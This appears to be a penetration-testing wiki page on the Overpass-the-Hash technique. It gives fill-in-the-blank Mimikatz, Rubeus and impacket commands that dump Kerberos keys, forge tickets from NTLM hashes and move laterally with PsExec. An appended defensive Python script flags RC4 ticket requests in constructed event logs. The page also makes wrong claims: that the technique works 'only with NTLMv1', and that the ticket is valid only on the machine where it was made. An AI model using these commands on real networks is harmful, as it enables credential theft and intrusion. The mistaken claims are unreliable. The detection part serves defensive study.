# Overpass the Hash

Only with **NTLMv1**.

Turn a Kerberos key of a domain user (the RC4 key is the NTLM hash itself) into a Kerberos ticket (TGT) and use it for authentication. The ticket is valid only for the machine for which it was created.

{% tabs %}
{% tab title="Windows" %}

## [Mimikatz](https://github.com/gentilkiwi/mimikatz)

* Requires Administrator Privileges

View the Kerberos keys:

{% code overflow="wrap" %}

```powershell
.\mimikatz.exe
> privilege::debug
> sekurlsa::ekeys
```

{% endcode %}

Open a new CMD as the victim user:

{% code overflow="wrap" %}

```powershell
> sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<KEY/NTLM> [/run:Powershell.exe]
```

{% endcode %}

Instead of `/ntlm` there is also `/rc4`, `/aes128` or `/aes256`.

In the new terminal, which now holds the victim's ticket, you can:

```powershell
net use \\<ComputerName>
# PsExec options go before the target and the program to run
PsExec.exe -accepteula \\<ComputerName> cmd.exe
```

## [Rubeus](https://github.com/GhostPack/Rubeus)

* Does **NOT** require Administrator privileges

Request a new TGT for the given user, display it, and then import it into the current session *(much like setting a cookie)*.

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /nowrap
# the ticket is printed in base64
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe ptt /ticket:<BASE64_TICKET>
```

{% endcode %}

Or request the TGT for the given user and import it immediately without displaying it:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /ptt
```

{% endcode %}

Instead of `/rc4` you can also use `/aes128`, `/aes256` or `/des`.
{% endtab %}

{% tab title="Linux" %}
Get the TGT with [getTGT](https://github.com/fortra/impacket/blob/master/examples/getTGT.py):

{% code overflow="wrap" %}

```bash
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>' -hashes :<NTLM_HASH>
```

{% endcode %}

Import it (getTGT writes the ticket to `<USER>.ccache`):

{% code overflow="wrap" %}

```bash
chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist
```

{% endcode %}

Use it with Kerberos authentication (`-k` for the impacket tools, `--use-kcache` for nxc):

```bash
nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> <HOSTNAME_TARGET>
# also with impacket-secretsdump, impacket-wmiexec, etc.
```

{% endtab %}
{% endtabs %}
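As an added example (not from the original page), a defender's check for the RC4 variants above: Windows Security Event ID 4768 records the encryption type of every TGT request, and an RC4 (0x17) request for an account that otherwise receives AES tickets is the usual trace of a TGT obtained from an NTLM hash. The event records and their field names below are constructed.

```python
"""Flag TGT requests (Windows Security Event ID 4768) that use RC4
(encryption type 0x17) for accounts that normally obtain AES tickets.
A TGT requested from an NTLM hash is RC4-keyed and stands out in an
AES-by-default domain. The sample events are constructed."""
from collections import defaultdict

RC4 = 0x17
AES = {0x11, 0x12}  # AES128 / AES256

# Constructed 4768/4769 events (field subset: account, client IP, etype, result)
EVENTS = [
    {"id": 4768, "user": "alice",  "ip": "10.0.0.21", "etype": 0x12, "status": "0x0"},
    {"id": 4768, "user": "alice",  "ip": "10.0.0.21", "etype": 0x12, "status": "0x0"},
    {"id": 4768, "user": "alice",  "ip": "10.0.0.99", "etype": 0x17, "status": "0x0"},
    {"id": 4768, "user": "bob",    "ip": "10.0.0.30", "etype": 0x17, "status": "0x0"},
    {"id": 4768, "user": "srv01$", "ip": "10.0.0.5",  "etype": 0x12, "status": "0x0"},
    {"id": 4769, "user": "alice",  "ip": "10.0.0.99", "etype": 0x17, "status": "0x0"},
]


def baseline_etypes(events):
    """Per-account set of encryption types seen in successful TGT requests."""
    seen = defaultdict(set)
    for e in events:
        if e["id"] == 4768 and e["status"] == "0x0":
            seen[e["user"]].add(e["etype"])
    return seen


def find_rc4_anomalies(events):
    """Return (user, ip) for RC4 TGT requests by accounts that also use AES.
    Accounts that only ever use RC4 (like bob) are legacy, not anomalies here."""
    seen = baseline_etypes(events)
    hits = []
    for e in events:
        if e["id"] != 4768 or e["etype"] != RC4:
            continue  # only TGT requests with an RC4 session key
        if e["user"].endswith("$"):
            continue  # machine accounts: baseline them separately
        if seen[e["user"]] & AES:
            hits.append((e["user"], e["ip"]))
    return hits


if __name__ == "__main__":
    for user, ip in find_rc4_anomalies(EVENTS):
        print(f"RC4 TGT request for AES-capable account {user} from {ip}")
```

Because the page notes that `/aes128` and `/aes256` keys work too, this check covers only the NTLM/RC4 case; a TGT requested with an AES key looks like a normal request, so also correlate the source host with the account's usual logon locations.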
